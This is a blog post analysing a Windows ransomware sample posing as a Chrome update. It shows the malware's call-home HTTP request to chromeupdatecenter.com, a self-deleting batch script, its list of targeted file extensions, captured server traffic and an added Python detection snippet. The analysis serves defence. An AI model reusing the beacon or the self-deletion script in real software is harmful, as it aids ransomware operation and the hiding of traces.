Dissecting a Windows malware

chromeupdatecenter.com Screenshot

Through a friend of mine I got hold of this seemingly fresh malware named GoogleChromeUpdater.exe. The page (see the URL at the end of the post) claims to distribute an important Chrome update. However, the malware encrypts files and leaves an e-mail address: the classic file kidnapping along with blackmail.

Note: If you are infected by this malware, your chances of getting your data back are bad. The encryption key is likely stored only on the attacker's server. Unless somebody breaks the encryption, you cannot restore your data. And of course, you should not feed criminals! 🙂

I could not resist and had to have a closer look at the malware…

I downloaded the malware and loaded it into IDA, where I could get an idea of what it is doing. One function obviously makes an HTTP call back to the site: I found this string inside, along with calls to connect, ioctlsocket, send and friends.

GET /%d/%d HTTP/1.1
Host: %s
Accept: text/html
Connection: keep-alive
BroAgent: needle

Disassembled in IDA

The %s after Host is replaced with chromeupdatecenter.com. I wonder what that request might send back, but I will come to that later.

Furthermore, there is a snippet of a Windows batch file, which is likely created to delete the malware itself or other traces:

@echo off
:try
ping -n 5 127.0.0.1
del "%s"
if exist "%s" goto try
del %%0

The ping to localhost is likely an easy way to wait for a few seconds, while %s is replaced by the malware name. At the end, the batch file deletes itself.

There are also calls to FindFirstFile/FindNextFile, which the malware uses to find the files. I also found a list of file extensions that are likely affected by the malware:

key, db3, pl, cgi, py, rbw, rb, class, java, pas, vbs, ascx, aspx, jsl, cs, vb, rar, zip, 7z, cfg, conf, css, pl, js, phtm, phtml, php, cert, pem, dtd, xsd, xslt, xsl, xml, inc, asm, idl, resx, rc, inl, hh, hxx, hpp, h, tlh, tli, cc, cxx, cpp, c, dbf, dbc, myd, myi, frm, mysql, sql, pff, st, geo, grs, vrp, erf, epf, cfu, cf, dt, mxl, 1cd, cd, cdx, md, dws, 3ds, ads, dxf, dwf, dwt, dwg, wdp, pdf, accdr, accdt, accde, accdb, mdb, vdp, vdproj, vcp, props, mdp, dsp, vcproj, vcxproj, dbproj, vbproj, vcw, dsw, sln, vdx, vstm, vstx, vssm, vssx, vsdm, vsdx, thmx, sldm, sldx, ppsm, ppsx, ppam, potm, potx, pptm, pptx, ppt, xlam, xlsb, xltm, xltx, xlsm, xlsx, xls, xsl, txt, rtf, odt, dotm, dotx, docm, docx, doc, dib, rle, pdd, eps, raw, pdp, jpe, jpc, j2k, j2c, jp2, jpx, jpf, pxr, vst, icb, vda, tga, tiff, tif, wbmp, wbm, psd, pcd, png, gif, bmp, jpeg, jpg, pam, pfm, pnm, ppm, pgm, pbm, pict, pct,

The domain chromeupdatecenter.com was registered on 23 January 2014. The registrar is ukrnames.com (Center of Ukrainian Internet Names); the registrant is an “Alex John”, Scottsdale, United States, which is most likely fake.

OK, now it's time to run the malware. I created some files in a virtual Windows 7 machine and fired up the malware while having Wireshark running.

After about 20 seconds, the malware started its work. I saw an HTTP connection to chromeupdatecenter.com, along with an answer:

GET /1/1 HTTP/1.1
Host: chromeupdatecenter.com
Accept: text/html
Connection: keep-alive
BroAgent: needle
.HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 22646
Accept-Ranges: bytes
ACC: 22152
Set-Cookie: EID=bd1700b48c6cb93a87f0b7ee761b5fbfe23bf835a2ddffa52ddf98f9b7d340b49ece3dbc9398ef894b737bb180ed4dd0d64245220c11.721
Server: nginx
...

Exactly as expected, I got an answer from the server. The interesting part here is the Set-Cookie header: the EID seems to be some kind of hash, along with an ID (721). Interestingly, my now-encrypted files have exactly that ID appended, along with an e-mail address. This is likely an ID in their database, where they stored the key alongside. I’m not yet sure if the EID is the encryption key itself, or if the key is inside the response (note the content length: there is about 20 kB of binary data inside the response!). Obviously, I should now have all the components to try to crack/decrypt the files: the original data, the encrypted data and the key itself. However, my cryptography knowledge is too limited; any help is appreciated…
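The traffic above gives two things a defender can match on: the request template with its non-standard BroAgent header, and the EID cookie with the trailing ID. The following is an added example, not part of the original post or the malware; the function names are assumptions, and the sample traffic is the capture shown above plus one constructed benign request.

```python
import re

# Request and response head as captured in the post above.
CAPTURED_REQUEST = (
    "GET /1/1 HTTP/1.1\r\n"
    "Host: chromeupdatecenter.com\r\n"
    "Accept: text/html\r\n"
    "Connection: keep-alive\r\n"
    "BroAgent: needle\r\n\r\n"
)
CAPTURED_RESPONSE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 22646\r\n"
    "Accept-Ranges: bytes\r\n"
    "ACC: 22152\r\n"
    "Set-Cookie: EID=bd1700b48c6cb93a87f0b7ee761b5fbfe23bf835a2ddffa52ddf98f9b7d340b49ece3dbc9398ef894b737bb180ed4dd0d64245220c11.721\r\n"
    "Server: nginx\r\n"
)
# Constructed benign request for comparison (not from the post).
BENIGN_REQUEST = "GET /1/1 HTTP/1.1\r\nHost: example.org\r\nUser-Agent: curl/8.0\r\n\r\n"

def headers(head):
    """Map lower-cased header names to values, skipping the first line."""
    out = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            out[name.strip().lower()] = value.strip()
    return out

def is_beacon(request):
    """Match the GET /%d/%d template plus the non-standard BroAgent header."""
    first_line = request.split("\r\n", 1)[0]
    path_ok = re.fullmatch(r"GET /-?\d+/-?\d+ HTTP/1\.1", first_line) is not None
    return path_ok and headers(request).get("broagent") == "needle"

def parse_eid(response_head):
    """Split the EID cookie into (hex string, numeric ID); None if absent."""
    cookie = headers(response_head).get("set-cookie", "")
    m = re.fullmatch(r"EID=([0-9a-f]+)\.(\d+)", cookie)
    return (m.group(1), int(m.group(2))) if m else None

if __name__ == "__main__":
    hex_part, victim_id = parse_eid(CAPTURED_RESPONSE_HEAD)
    print(is_beacon(CAPTURED_REQUEST), victim_id, len(hex_part) * 4, "bits of hex")
```

The split only separates the opaque hex part from the ID that also appears on the encrypted files; it does not settle whether the hex part is key material.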

Also, the malware places a text file called “AlertEncryptor.txt” in each directory; it again contains my ID along with the e-mail address and a description of how to restore the data. I did not find that description inside the malware, so this text is part of the response from the server.

Besides that, the downloaded malware is gone. As expected, the malware removes itself right after it finishes its work. No data was uploaded to the server (apart from the one HTTP request/response, there was no more traffic between the client and the server).

To all Windows users out there: check the origin when running executable files from the internet. Microsoft made those messages for a reason 🙂

Origin warning